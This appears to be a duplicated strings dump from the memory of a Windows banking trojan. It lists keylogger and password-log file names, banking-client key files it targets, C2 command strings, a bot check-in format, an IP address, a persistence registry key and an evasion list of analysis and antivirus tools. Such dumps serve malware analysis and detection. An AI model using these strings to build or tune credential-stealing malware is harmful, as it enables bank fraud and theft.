Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
http://
http://
https://
https://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: http://www.google.com
Referer: http://www.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
www.bing.com
www.bing.com
www.microsoft.com
www.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;<=
?456789:;<=
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
Explorer.EXE_880_rwx_01EF0000_0006A000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
<>http
<>http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
Ý %dh %dm
Ý %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
http://
http://
https://
https://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: http://www.google.com
Referer: http://www.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
www.bing.com
www.bing.com
www.microsoft.com
www.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;<=
?456789:;<=
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
ADM!XP3!F9BE9A8A
ADM!XP3!F9BE9A8A
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.ffffff00
MSCTF.Shared.MUTEX.ffffff00
%Documents and Settings%\%current user%\Application Data\
%Documents and Settings%\%current user%\Application Data\
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
svchost.exe_956_rwx_00ED0000_0005B000:
.text
.text
`.data
`.data
.reloc
.reloc
`.rdata
`.rdata
@.data
@.data
<>http
<>http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
Ý %dh %dm
Ý %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
